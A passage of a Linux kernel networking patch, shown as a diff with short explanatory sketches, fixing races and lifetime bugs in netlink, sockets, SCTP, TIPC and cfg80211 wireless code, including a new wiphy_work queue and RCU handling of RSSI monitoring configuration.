+index 387e430a35ccc..cb833302270a6 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -352,7 +352,7 @@ static void netlink_overrun(struct sock *sk)
+ 	if (!nlk_test_bit(RECV_NO_ENOBUFS, sk)) {
+ 		if (!test_and_set_bit(NETLINK_S_CONGESTED,
+ 				      &nlk_sk(sk)->state)) {
+-			sk->sk_err = ENOBUFS;
++			WRITE_ONCE(sk->sk_err, ENOBUFS);
+ 			sk_error_report(sk);
+ 		}
+ 	}
+@@ -1566,7 +1566,7 @@ static int do_one_set_err(struct sock *sk, struct netlink_set_err_data *p)
+ 		goto out;
+ 	}
+ 
+-	sk->sk_err = p->code;
++	WRITE_ONCE(sk->sk_err, p->code);
+ 	sk_error_report(sk);
+ out:
+ 	return ret;
+@@ -1955,7 +1955,7 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 	    atomic_read(&sk->sk_rmem_alloc) <= sk->sk_rcvbuf / 2) {
+ 		ret = netlink_dump(sk);
+ 		if (ret) {
+-			sk->sk_err = -ret;
++			WRITE_ONCE(sk->sk_err, -ret);
+ 			sk_error_report(sk);
+ 		}
+ 	}
+@@ -2443,19 +2443,24 @@ void netlink_ack(struct sk_buff *in_skb, struct nlmsghdr *nlh, int err,
+ 		flags |= NLM_F_ACK_TLVS;
+ 
+ 	skb = nlmsg_new(payload + tlvlen, GFP_KERNEL);
+-	if (!skb) {
+-		NETLINK_CB(in_skb).sk->sk_err = ENOBUFS;
+-		sk_error_report(NETLINK_CB(in_skb).sk);
+-		return;
+-	}
++	if (!skb)
++		goto err_skb;
+ 
+ 	rep = nlmsg_put(skb, NETLINK_CB(in_skb).portid, nlh->nlmsg_seq,
+-			NLMSG_ERROR, payload, flags);
++			NLMSG_ERROR, sizeof(*errmsg), flags);
++	if (!rep)
++		goto err_bad_put;
+ 	errmsg = nlmsg_data(rep);
+ 	errmsg->error = err;
+-	unsafe_memcpy(&errmsg->msg, nlh, payload > sizeof(*errmsg)
+-					 ? nlh->nlmsg_len : sizeof(*nlh),
+-		      /* Bounds checked by the skb layer. */);
++	errmsg->msg = *nlh;
++
++	if (!(flags & NLM_F_CAPPED)) {
++		if (!nlmsg_append(skb, nlmsg_len(nlh)))
++			goto err_bad_put;
++
++		memcpy(nlmsg_data(&errmsg->msg), nlmsg_data(nlh),
++		       nlmsg_len(nlh));
++	}
+ 
+ 	if (tlvlen)
+ 		netlink_ack_tlv_fill(in_skb, skb, nlh, err, extack);
+@@ -2463,6 +2468,14 @@ void netlink_ack(struct sk_buff *in_skb, struct nlmsghdr *nlh, int err,
+ 	nlmsg_end(skb, rep);
+ 
+ 	nlmsg_unicast(in_skb->sk, skb, NETLINK_CB(in_skb).portid);
++
++	return;
++
++err_bad_put:
++	nlmsg_free(skb);
++err_skb:
++	WRITE_ONCE(NETLINK_CB(in_skb).sk->sk_err, ENOBUFS);
++	sk_error_report(NETLINK_CB(in_skb).sk);
+ }
+ EXPORT_SYMBOL(netlink_ack);
+ 
+diff --git a/net/nfc/llcp_core.c b/net/nfc/llcp_core.c
+index f60e424e06076..6705bb895e239 100644
+--- a/net/nfc/llcp_core.c
++++ b/net/nfc/llcp_core.c
+@@ -1636,7 +1636,9 @@ int nfc_llcp_register_device(struct nfc_dev *ndev)
+ 	timer_setup(&local->sdreq_timer, nfc_llcp_sdreq_timer, 0);
+ 	INIT_WORK(&local->sdreq_timeout_work, nfc_llcp_sdreq_timeout_work);
+ 
++	spin_lock(&llcp_devices_lock);
+ 	list_add(&local->list, &llcp_devices);
++	spin_unlock(&llcp_devices_lock);
+ 
+ 	return 0;
+ }
+diff --git a/net/rds/tcp_connect.c b/net/rds/tcp_connect.c
+index f0c477c5d1db4..d788c6d28986f 100644
+--- a/net/rds/tcp_connect.c
++++ b/net/rds/tcp_connect.c
+@@ -173,7 +173,7 @@ int rds_tcp_conn_path_connect(struct rds_conn_path *cp)
+ 	 * own the socket
+ 	 */
+ 	rds_tcp_set_callbacks(sock, cp);
+-	ret = sock->ops->connect(sock, addr, addrlen, O_NONBLOCK);
++	ret = kernel_connect(sock, addr, addrlen, O_NONBLOCK);
+ 
+ 	rdsdebug("connect to address %pI6c returned %d\n", &conn->c_faddr, ret);
+ 	if (ret == -EINPROGRESS)
+diff --git a/net/sctp/associola.c b/net/sctp/associola.c
+index 3460abceba443..2965a12fe8aa2 100644
+--- a/net/sctp/associola.c
++++ b/net/sctp/associola.c
+@@ -1161,8 +1161,7 @@ int sctp_assoc_update(struct sctp_association *asoc,
+ 		/* Add any peer addresses from the new association. */
+ 		list_for_each_entry(trans, &new->peer.transport_addr_list,
+ 				    transports)
+-			if (!sctp_assoc_lookup_paddr(asoc, &trans->ipaddr) &&
+-			    !sctp_assoc_add_peer(asoc, &trans->ipaddr,
++			if (!sctp_assoc_add_peer(asoc, &trans->ipaddr,
+ 						 GFP_ATOMIC, trans->state))
+ 				return -ENOMEM;
+ 
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index 32e3669adf146..e25dc17091311 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -2449,6 +2449,7 @@ static int sctp_apply_peer_addr_params(struct sctp_paddrparams *params,
+ 			if (trans) {
+ 				trans->hbinterval =
+ 				    msecs_to_jiffies(params->spp_hbinterval);
++				sctp_transport_reset_hb_timer(trans);
+ 			} else if (asoc) {
+ 				asoc->hbinterval =
+ 				    msecs_to_jiffies(params->spp_hbinterval);
+diff --git a/net/socket.c b/net/socket.c
+index d281a7ef4b1d3..b0169168e3f4e 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -720,6 +720,14 @@ static inline int sock_sendmsg_nosec(struct socket *sock, struct msghdr *msg)
+ 	return ret;
+ }
+ 
++static int __sock_sendmsg(struct socket *sock, struct msghdr *msg)
++{
++	int err = security_socket_sendmsg(sock, msg,
++					  msg_data_left(msg));
++
++	return err ?: sock_sendmsg_nosec(sock, msg);
++}
++
+ /**
+  *	sock_sendmsg - send a message through @sock
+  *	@sock: socket
+@@ -730,10 +738,19 @@ static inline int sock_sendmsg_nosec(struct socket *sock, struct msghdr *msg)
+  */
+ int sock_sendmsg(struct socket *sock, struct msghdr *msg)
+ {
+-	int err = security_socket_sendmsg(sock, msg,
+-					  msg_data_left(msg));
++	struct sockaddr_storage *save_addr = (struct sockaddr_storage *)msg->msg_name;
++	struct sockaddr_storage address;
++	int ret;
+ 
+-	return err ?: sock_sendmsg_nosec(sock, msg);
++	if (msg->msg_name) {
++		memcpy(&address, msg->msg_name, msg->msg_namelen);
++		msg->msg_name = &address;
++	}
++
++	ret = __sock_sendmsg(sock, msg);
++	msg->msg_name = save_addr;
++
++	return ret;
+ }
+ EXPORT_SYMBOL(sock_sendmsg);
+ 
+@@ -1110,7 +1127,7 @@ static ssize_t sock_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 	if (sock->type == SOCK_SEQPACKET)
+ 		msg.msg_flags |= MSG_EOR;
+ 
+-	res = sock_sendmsg(sock, &msg);
++	res = __sock_sendmsg(sock, &msg);
+ 	*from = msg.msg_iter;
+ 	return res;
+ }
+@@ -2114,7 +2131,7 @@ int __sys_sendto(int fd, void __user *buff, size_t len, unsigned int flags,
+ 	if (sock->file->f_flags & O_NONBLOCK)
+ 		flags |= MSG_DONTWAIT;
+ 	msg.msg_flags = flags;
+-	err = sock_sendmsg(sock, &msg);
++	err = __sock_sendmsg(sock, &msg);
+ 
+ out_put:
+ 	fput_light(sock->file, fput_needed);
+@@ -2479,7 +2496,7 @@ static int ____sys_sendmsg(struct socket *sock, struct msghdr *msg_sys,
+ 		err = sock_sendmsg_nosec(sock, msg_sys);
+ 		goto out_freectl;
+ 	}
+-	err = sock_sendmsg(sock, msg_sys);
++	err = __sock_sendmsg(sock, msg_sys);
+ 	/*
+ 	 * If this is sendmmsg() and sending to current destination address was
+ 	 * successful, remember it.
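
The sock_sendmsg() change above defends the caller's address buffer: layers underneath (such as BPF sockaddr hooks) may rewrite msg->msg_name, so the address is copied to an on-stack sockaddr_storage for the duration of the call and the original pointer is restored afterwards. The same defensive-copy pattern in stand-alone form (an illustrative sketch, not the kernel code):

	#include <string.h>
	#include <sys/socket.h>

	/* Call fn() with a private copy of the destination address so any
	 * rewriting done underneath never reaches the caller's buffer.
	 */
	static int send_with_addr_copy(struct msghdr *msg,
				       int (*fn)(struct msghdr *))
	{
		struct sockaddr_storage *saved = msg->msg_name;
		struct sockaddr_storage copy;
		int ret;

		if (msg->msg_name) {
			memcpy(&copy, msg->msg_name, msg->msg_namelen);
			msg->msg_name = &copy;
		}

		ret = fn(msg);
		msg->msg_name = saved;	/* caller sees its original pointer */
		return ret;
	}
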
+diff --git a/net/tipc/crypto.c b/net/tipc/crypto.c
+index 2b236d95a6469..65f59739a041a 100644
+--- a/net/tipc/crypto.c
++++ b/net/tipc/crypto.c
+@@ -1441,14 +1441,14 @@ static int tipc_crypto_key_revoke(struct net *net, u8 tx_key)
+ 	struct tipc_crypto *tx = tipc_net(net)->crypto_tx;
+ 	struct tipc_key key;
+ 
+-	spin_lock(&tx->lock);
++	spin_lock_bh(&tx->lock);
+ 	key = tx->key;
+ 	WARN_ON(!key.active || tx_key != key.active);
+ 
+ 	/* Free the active key */
+ 	tipc_crypto_key_set_state(tx, key.passive, 0, key.pending);
+ 	tipc_crypto_key_detach(tx->aead[key.active], &tx->lock);
+-	spin_unlock(&tx->lock);
++	spin_unlock_bh(&tx->lock);
+ 
+ 	pr_warn("%s: key is revoked\n", tx->name);
+ 	return -EKEYREVOKED;
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index 609b79fe4a748..2c79604672062 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -408,6 +408,34 @@ static void cfg80211_propagate_cac_done_wk(struct work_struct *work)
+ 	rtnl_unlock();
+ }
+ 
++static void cfg80211_wiphy_work(struct work_struct *work)
++{
++	struct cfg80211_registered_device *rdev;
++	struct wiphy_work *wk;
++
++	rdev = container_of(work, struct cfg80211_registered_device, wiphy_work);
++
++	wiphy_lock(&rdev->wiphy);
++	if (rdev->suspended)
++		goto out;
++
++	spin_lock_irq(&rdev->wiphy_work_lock);
++	wk = list_first_entry_or_null(&rdev->wiphy_work_list,
++				      struct wiphy_work, entry);
++	if (wk) {
++		list_del_init(&wk->entry);
++		if (!list_empty(&rdev->wiphy_work_list))
++			schedule_work(work);
++		spin_unlock_irq(&rdev->wiphy_work_lock);
++
++		wk->func(&rdev->wiphy, wk);
++	} else {
++		spin_unlock_irq(&rdev->wiphy_work_lock);
++	}
++out:
++	wiphy_unlock(&rdev->wiphy);
++}
++
+ /* exported functions */
+ 
+ struct wiphy *wiphy_new_nm(const struct cfg80211_ops *ops, int sizeof_priv,
+@@ -533,6 +561,9 @@ use_default_name:
+ 		return NULL;
+ 	}
+ 
++	INIT_WORK(&rdev->wiphy_work, cfg80211_wiphy_work);
++	INIT_LIST_HEAD(&rdev->wiphy_work_list);
++	spin_lock_init(&rdev->wiphy_work_lock);
+ 	INIT_WORK(&rdev->rfkill_block, cfg80211_rfkill_block_work);
+ 	INIT_WORK(&rdev->conn_work, cfg80211_conn_work);
+ 	INIT_WORK(&rdev->event_work, cfg80211_event_work);
+@@ -1011,6 +1042,31 @@ void wiphy_rfkill_start_polling(struct wiphy *wiphy)
+ }
+ EXPORT_SYMBOL(wiphy_rfkill_start_polling);
+ 
++void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev)
++{
++	unsigned int runaway_limit = 100;
++	unsigned long flags;
++
++	lockdep_assert_held(&rdev->wiphy.mtx);
++
++	spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
++	while (!list_empty(&rdev->wiphy_work_list)) {
++		struct wiphy_work *wk;
++
++		wk = list_first_entry(&rdev->wiphy_work_list,
++				      struct wiphy_work, entry);
++		list_del_init(&wk->entry);
++		spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
++
++		wk->func(&rdev->wiphy, wk);
++
++		spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
++		if (WARN_ON(--runaway_limit == 0))
++			INIT_LIST_HEAD(&rdev->wiphy_work_list);
++	}
++	spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
++}
++
+ void wiphy_unregister(struct wiphy *wiphy)
+ {
+ 	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
+@@ -1049,9 +1105,19 @@ void wiphy_unregister(struct wiphy *wiphy)
+ 	cfg80211_rdev_list_generation++;
+ 	device_del(&rdev->wiphy.dev);
+ 
++#ifdef CONFIG_PM
++	if (rdev->wiphy.wowlan_config && rdev->ops->set_wakeup)
++		rdev_set_wakeup(rdev, false);
++#endif
++
++	/* surely nothing is reachable now, clean up work */
++	cfg80211_process_wiphy_works(rdev);
+ 	wiphy_unlock(&rdev->wiphy);
+ 	rtnl_unlock();
+ 
++	/* this has nothing to do now but make sure it's gone */
++	cancel_work_sync(&rdev->wiphy_work);
++
+ 	flush_work(&rdev->scan_done_wk);
+ 	cancel_work_sync(&rdev->conn_work);
+ 	flush_work(&rdev->event_work);
+@@ -1064,10 +1130,6 @@ void wiphy_unregister(struct wiphy *wiphy)
+ 	flush_work(&rdev->mgmt_registrations_update_wk);
+ 	flush_work(&rdev->background_cac_abort_wk);
+ 
+-#ifdef CONFIG_PM
+-	if (rdev->wiphy.wowlan_config && rdev->ops->set_wakeup)
+-		rdev_set_wakeup(rdev, false);
+-#endif
+ 	cfg80211_rdev_free_wowlan(rdev);
+ 	cfg80211_rdev_free_coalesce(rdev);
+ }
+@@ -1114,16 +1176,11 @@ void wiphy_rfkill_set_hw_state_reason(struct wiphy *wiphy, bool blocked,
+ }
+ EXPORT_SYMBOL(wiphy_rfkill_set_hw_state_reason);
+ 
+-void cfg80211_cqm_config_free(struct wireless_dev *wdev)
+-{
+-	kfree(wdev->cqm_config);
+-	wdev->cqm_config = NULL;
+-}
+-
+ static void _cfg80211_unregister_wdev(struct wireless_dev *wdev,
+ 				      bool unregister_netdev)
+ {
+ 	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wdev->wiphy);
++	struct cfg80211_cqm_config *cqm_config;
+ 	unsigned int link_id;
+ 
+ 	ASSERT_RTNL();
+@@ -1162,11 +1219,10 @@ static void _cfg80211_unregister_wdev(struct wireless_dev *wdev,
+ 	kfree_sensitive(wdev->wext.keys);
+ 	wdev->wext.keys = NULL;
+ #endif
+-	/* only initialized if we have a netdev */
+-	if (wdev->netdev)
+-		flush_work(&wdev->disconnect_wk);
+-
+-	cfg80211_cqm_config_free(wdev);
++	wiphy_work_cancel(wdev->wiphy, &wdev->cqm_rssi_work);
++	/* deleted from the list, so can't be found from nl80211 any more */
++	cqm_config = rcu_access_pointer(wdev->cqm_config);
++	kfree_rcu(cqm_config, rcu_head);
+ 
+ 	/*
+ 	 * Ensure that all events have been processed and
+@@ -1318,6 +1374,8 @@ void cfg80211_init_wdev(struct wireless_dev *wdev)
+ 	wdev->wext.connect.auth_type = NL80211_AUTHTYPE_AUTOMATIC;
+ #endif
+ 
++	wiphy_work_init(&wdev->cqm_rssi_work, cfg80211_cqm_rssi_notify_work);
++
+ 	if (wdev->wiphy->flags & WIPHY_FLAG_PS_ON_BY_DEFAULT)
+ 		wdev->ps = true;
+ 	else
+@@ -1439,6 +1497,8 @@ static int cfg80211_netdev_notifier_call(struct notifier_block *nb,
+ 		cfg80211_leave(rdev, wdev);
+ 		cfg80211_remove_links(wdev);
+ 		wiphy_unlock(&rdev->wiphy);
++		/* since we just did cfg80211_leave() nothing to do there */
++		cancel_work_sync(&wdev->disconnect_wk);
+ 		break;
+ 	case NETDEV_DOWN:
+ 		wiphy_lock(&rdev->wiphy);
+@@ -1548,6 +1608,66 @@ static struct pernet_operations cfg80211_pernet_ops = {
+ 	.exit = cfg80211_pernet_exit,
+ };
+ 
++void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work)
++{
++	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
++	unsigned long flags;
++
++	spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
++	if (list_empty(&work->entry))
++		list_add_tail(&work->entry, &rdev->wiphy_work_list);
++	spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
++
++	schedule_work(&rdev->wiphy_work);
++}
++EXPORT_SYMBOL_GPL(wiphy_work_queue);
++
++void wiphy_work_cancel(struct wiphy *wiphy, struct wiphy_work *work)
++{
++	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
++	unsigned long flags;
++
++	lockdep_assert_held(&wiphy->mtx);
++
++	spin_lock_irqsave(&rdev->wiphy_work_lock, flags);
++	if (!list_empty(&work->entry))
++		list_del_init(&work->entry);
++	spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
++}
++EXPORT_SYMBOL_GPL(wiphy_work_cancel);
++
++void wiphy_delayed_work_timer(struct timer_list *t)
++{
++	struct wiphy_delayed_work *dwork = from_timer(dwork, t, timer);
++
++	wiphy_work_queue(dwork->wiphy, &dwork->work);
++}
++EXPORT_SYMBOL(wiphy_delayed_work_timer);
++
++void wiphy_delayed_work_queue(struct wiphy *wiphy,
++			      struct wiphy_delayed_work *dwork,
++			      unsigned long delay)
++{
++	if (!delay) {
++		wiphy_work_queue(wiphy, &dwork->work);
++		return;
++	}
++
++	dwork->wiphy = wiphy;
++	mod_timer(&dwork->timer, jiffies + delay);
++}
++EXPORT_SYMBOL_GPL(wiphy_delayed_work_queue);
++
++void wiphy_delayed_work_cancel(struct wiphy *wiphy,
++			       struct wiphy_delayed_work *dwork)
++{
++	lockdep_assert_held(&wiphy->mtx);
++
++	del_timer_sync(&dwork->timer);
++	wiphy_work_cancel(wiphy, &dwork->work);
++}
++EXPORT_SYMBOL_GPL(wiphy_delayed_work_cancel);
++
+ static int __init cfg80211_init(void)
+ {
+ 	int err;
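
The new wiphy_work machinery mirrors the ordinary workqueue API but runs every handler with the wiphy mutex already held and parks queued work while the device is suspended. A hedged usage sketch built only from the functions added above; the driver-side scaffolding is hypothetical:

	/* Only the wiphy_work_* calls are real; struct my_drv and the
	 * my_* functions are illustrative.
	 */
	struct my_drv {
		struct wiphy *wiphy;
		struct wiphy_work roc_done;
	};

	static void my_roc_done(struct wiphy *wiphy, struct wiphy_work *work)
	{
		/* wiphy->mtx is held here, no extra locking needed */
	}

	static void my_init(struct my_drv *drv)
	{
		wiphy_work_init(&drv->roc_done, my_roc_done);
	}

	static void my_irq_path(struct my_drv *drv)
	{
		/* safe from any context; runs later under wiphy_lock() */
		wiphy_work_queue(drv->wiphy, &drv->roc_done);
	}

	static void my_teardown(struct my_drv *drv)
	{
		/* caller must hold the wiphy mutex, as the new code asserts */
		wiphy_work_cancel(drv->wiphy, &drv->roc_done);
	}
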
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index 775e16cb99eda..86fd79912254d 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -108,6 +108,12 @@ struct cfg80211_registered_device {
+ 	/* lock for all wdev lists */
+ 	spinlock_t mgmt_registrations_lock;
+ 
++	struct work_struct wiphy_work;
++	struct list_head wiphy_work_list;
++	/* protects the list above */
++	spinlock_t wiphy_work_lock;
++	bool suspended;
++
+ 	/* must be last because of the way we do wiphy_priv(),
+ 	 * and it should at least be aligned to NETDEV_ALIGN */
+ 	struct wiphy wiphy __aligned(NETDEV_ALIGN);
+@@ -287,12 +293,17 @@ struct cfg80211_beacon_registration {
+ };
+ 
+ struct cfg80211_cqm_config {
++	struct rcu_head rcu_head;
+ 	u32 rssi_hyst;
+ 	s32 last_rssi_event_value;
++	enum nl80211_cqm_rssi_threshold_event last_rssi_event_type;
+ 	int n_rssi_thresholds;
+ 	s32 rssi_thresholds[];
+ };
+ 
++void cfg80211_cqm_rssi_notify_work(struct wiphy *wiphy,
++				   struct wiphy_work *work);
++
+ void cfg80211_destroy_ifaces(struct cfg80211_registered_device *rdev);
+ 
+ /* free object */
+@@ -450,6 +461,7 @@ int cfg80211_change_iface(struct cfg80211_registered_device *rdev,
+ 			  struct net_device *dev, enum nl80211_iftype ntype,
+ 			  struct vif_params *params);
+ void cfg80211_process_rdev_events(struct cfg80211_registered_device *rdev);
++void cfg80211_process_wiphy_works(struct cfg80211_registered_device *rdev);
+ void cfg80211_process_wdev_events(struct wireless_dev *wdev);
+ 
+ bool cfg80211_does_bw_fit_range(const struct ieee80211_freq_range *freq_range,
+@@ -556,8 +568,6 @@ cfg80211_bss_update(struct cfg80211_registered_device *rdev,
+ #define CFG80211_DEV_WARN_ON(cond)	({bool __r = (cond); __r; })
+ #endif
+ 
+-void cfg80211_cqm_config_free(struct wireless_dev *wdev);
+-
+ void cfg80211_release_pmsr(struct wireless_dev *wdev, u32 portid);
+ void cfg80211_pmsr_wdev_down(struct wireless_dev *wdev);
+ void cfg80211_pmsr_free_wk(struct work_struct *work);
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 12c7c89d5be1d..1d993a490ac4b 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -12565,7 +12565,8 @@ static int nl80211_set_cqm_txe(struct genl_info *info,
+ }
+ 
+ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+-				    struct net_device *dev)
++				    struct net_device *dev,
++				    struct cfg80211_cqm_config *cqm_config)
+ {
+ 	struct wireless_dev *wdev = dev->ieee80211_ptr;
+ 	s32 last, low, high;
+@@ -12574,7 +12575,7 @@ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+ 	int err;
+ 
+ 	/* RSSI reporting disabled? */
+-	if (!wdev->cqm_config)
++	if (!cqm_config)
+ 		return rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
+ 
+ 	/*
+@@ -12583,7 +12584,7 @@ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+ 	 * connection is established and enough beacons received to calculate
+ 	 * the average.
+ 	 */
+-	if (!wdev->cqm_config->last_rssi_event_value &&
++	if (!cqm_config->last_rssi_event_value &&
+ 	    wdev->links[0].client.current_bss &&
+ 	    rdev->ops->get_station) {
+ 		struct station_info sinfo = {};
+@@ -12597,30 +12598,30 @@ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+ 
+ 		cfg80211_sinfo_release_content(&sinfo);
+ 		if (sinfo.filled & BIT_ULL(NL80211_STA_INFO_BEACON_SIGNAL_AVG))
+-			wdev->cqm_config->last_rssi_event_value =
++			cqm_config->last_rssi_event_value =
+ 				(s8) sinfo.rx_beacon_signal_avg;
+ 	}
+ 
+-	last = wdev->cqm_config->last_rssi_event_value;
+-	hyst = wdev->cqm_config->rssi_hyst;
+-	n = wdev->cqm_config->n_rssi_thresholds;
++	last = cqm_config->last_rssi_event_value;
++	hyst = cqm_config->rssi_hyst;
++	n = cqm_config->n_rssi_thresholds;
+ 
+ 	for (i = 0; i < n; i++) {
+ 		i = array_index_nospec(i, n);
+-		if (last < wdev->cqm_config->rssi_thresholds[i])
++		if (last < cqm_config->rssi_thresholds[i])
+ 			break;
+ 	}
+ 
+ 	low_index = i - 1;
+ 	if (low_index >= 0) {
+ 		low_index = array_index_nospec(low_index, n);
+-		low = wdev->cqm_config->rssi_thresholds[low_index] - hyst;
++		low = cqm_config->rssi_thresholds[low_index] - hyst;
+ 	} else {
+ 		low = S32_MIN;
+ 	}
+ 	if (i < n) {
+ 		i = array_index_nospec(i, n);
+-		high = wdev->cqm_config->rssi_thresholds[i] + hyst - 1;
++		high = cqm_config->rssi_thresholds[i] + hyst - 1;
+ 	} else {
+ 		high = S32_MAX;
+ 	}
+@@ -12633,6 +12634,7 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 				u32 hysteresis)
+ {
+ 	struct cfg80211_registered_device *rdev = info->user_ptr[0];
++	struct cfg80211_cqm_config *cqm_config = NULL, *old;
+ 	struct net_device *dev = info->user_ptr[1];
+ 	struct wireless_dev *wdev = dev->ieee80211_ptr;
+ 	int i, err;
+@@ -12650,10 +12652,6 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	    wdev->iftype != NL80211_IFTYPE_P2P_CLIENT)
+ 		return -EOPNOTSUPP;
+ 
+-	wdev_lock(wdev);
+-	cfg80211_cqm_config_free(wdev);
+-	wdev_unlock(wdev);
+-
+ 	if (n_thresholds <= 1 && rdev->ops->set_cqm_rssi_config) {
+ 		if (n_thresholds == 0 || thresholds[0] == 0) /* Disabling */
+ 			return rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
+@@ -12670,9 +12668,10 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 		n_thresholds = 0;
+ 
+ 	wdev_lock(wdev);
+-	if (n_thresholds) {
+-		struct cfg80211_cqm_config *cqm_config;
++	old = rcu_dereference_protected(wdev->cqm_config,
++					lockdep_is_held(&wdev->mtx));
+ 
++	if (n_thresholds) {
+ 		cqm_config = kzalloc(struct_size(cqm_config, rssi_thresholds,
+ 						 n_thresholds),
+ 				     GFP_KERNEL);
+@@ -12687,11 +12686,18 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 		       flex_array_size(cqm_config, rssi_thresholds,
+ 				       n_thresholds));
+ 
+-		wdev->cqm_config = cqm_config;
++		rcu_assign_pointer(wdev->cqm_config, cqm_config);
++	} else {
++		RCU_INIT_POINTER(wdev->cqm_config, NULL);
+ 	}
+ 
+-	err = cfg80211_cqm_rssi_update(rdev, dev);
+-
++	err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
++	if (err) {
++		rcu_assign_pointer(wdev->cqm_config, old);
++		kfree_rcu(cqm_config, rcu_head);
++	} else {
++		kfree_rcu(old, rcu_head);
++	}
+ unlock:
+ 	wdev_unlock(wdev);
+ 
+@@ -18719,9 +18725,8 @@ void cfg80211_cqm_rssi_notify(struct net_device *dev,
+ 			      enum nl80211_cqm_rssi_threshold_event rssi_event,
+ 			      s32 rssi_level, gfp_t gfp)
+ {
+-	struct sk_buff *msg;
+ 	struct wireless_dev *wdev = dev->ieee80211_ptr;
+-	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wdev->wiphy);
++	struct cfg80211_cqm_config *cqm_config;
+ 
+ 	trace_cfg80211_cqm_rssi_notify(dev, rssi_event, rssi_level);
+ 
+@@ -18729,18 +18734,41 @@ void cfg80211_cqm_rssi_notify(struct net_device *dev,
+ 		    rssi_event != NL80211_CQM_RSSI_THRESHOLD_EVENT_HIGH))
+ 		return;
+ 
+-	if (wdev->cqm_config) {
+-		wdev->cqm_config->last_rssi_event_value = rssi_level;
++	rcu_read_lock();
++	cqm_config = rcu_dereference(wdev->cqm_config);
++	if (cqm_config) {
++		cqm_config->last_rssi_event_value = rssi_level;
++		cqm_config->last_rssi_event_type = rssi_event;
++		wiphy_work_queue(wdev->wiphy, &wdev->cqm_rssi_work);
++	}
++	rcu_read_unlock();
++}
++EXPORT_SYMBOL(cfg80211_cqm_rssi_notify);
++
++void cfg80211_cqm_rssi_notify_work(struct wiphy *wiphy, struct wiphy_work *work)
++{
++	struct wireless_dev *wdev = container_of(work, struct wireless_dev,
++						 cqm_rssi_work);
++	struct cfg80211_registered_device *rdev = wiphy_to_rdev(wiphy);
++	enum nl80211_cqm_rssi_threshold_event rssi_event;
++	struct cfg80211_cqm_config *cqm_config;
++	struct sk_buff *msg;
++	s32 rssi_level;
+ 
+-		cfg80211_cqm_rssi_update(rdev, dev);
++	wdev_lock(wdev);
++	cqm_config = rcu_dereference_protected(wdev->cqm_config,
++					       lockdep_is_held(&wdev->mtx));
++	if (!wdev->cqm_config)
++		goto unlock;
+ 
+-		if (rssi_level == 0)
+-			rssi_level = wdev->cqm_config->last_rssi_event_value;
+-	}
++	cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
+ 
+-	msg = cfg80211_prepare_cqm(dev, NULL, gfp);
++	rssi_level = cqm_config->last_rssi_event_value;
++	rssi_event = cqm_config->last_rssi_event_type;
++
++	msg = cfg80211_prepare_cqm(wdev->netdev, NULL, GFP_KERNEL);
+ 	if (!msg)
+-		return;
++		goto unlock;
+ 
+ 	if (nla_put_u32(msg, NL80211_ATTR_CQM_RSSI_THRESHOLD_EVENT,
+ 			rssi_event))
+@@ -18750,14 +18778,15 @@ void cfg80211_cqm_rssi_notify(struct net_device *dev,
+ 				      rssi_level))
+ 		goto nla_put_failure;
+ 
+-	cfg80211_send_cqm(msg, gfp);
++	cfg80211_send_cqm(msg, GFP_KERNEL);
+ 
+-	return;
++	goto unlock;
+ 
+  nla_put_failure:
+ 	nlmsg_free(msg);
++ unlock:
++	wdev_unlock(wdev);
+ }
+-EXPORT_SYMBOL(cfg80211_cqm_rssi_notify);
+ 
+ void cfg80211_cqm_txe_notify(struct net_device *dev,
+ 			     const u8 *peer, u32 num_packets,
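
The cqm_config lifetime fix above follows the standard RCU publish/retire pattern: readers use rcu_dereference() inside rcu_read_lock(), the update path swaps the pointer with rcu_assign_pointer() under the wdev lock, and the old object is freed with kfree_rcu() once a grace period has elapsed. Schematically (a sketch of the pattern, not the exact cfg80211 code):

	/* Update side, with the protecting lock held: */
	old = rcu_dereference_protected(wdev->cqm_config,
					lockdep_is_held(&wdev->mtx));
	rcu_assign_pointer(wdev->cqm_config, new_cfg); /* publish */
	kfree_rcu(old, rcu_head);       /* retire after grace period */

	/* Read side, lockless: */
	rcu_read_lock();
	cfg = rcu_dereference(wdev->cqm_config);
	if (cfg)
		/* cfg stays valid until rcu_read_unlock() */;
	rcu_read_unlock();
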
+diff --git a/net/wireless/sme.c b/net/wireless/sme.c
+index 6e87d2cd83456..b97834284baef 100644
+--- a/net/wireless/sme.c
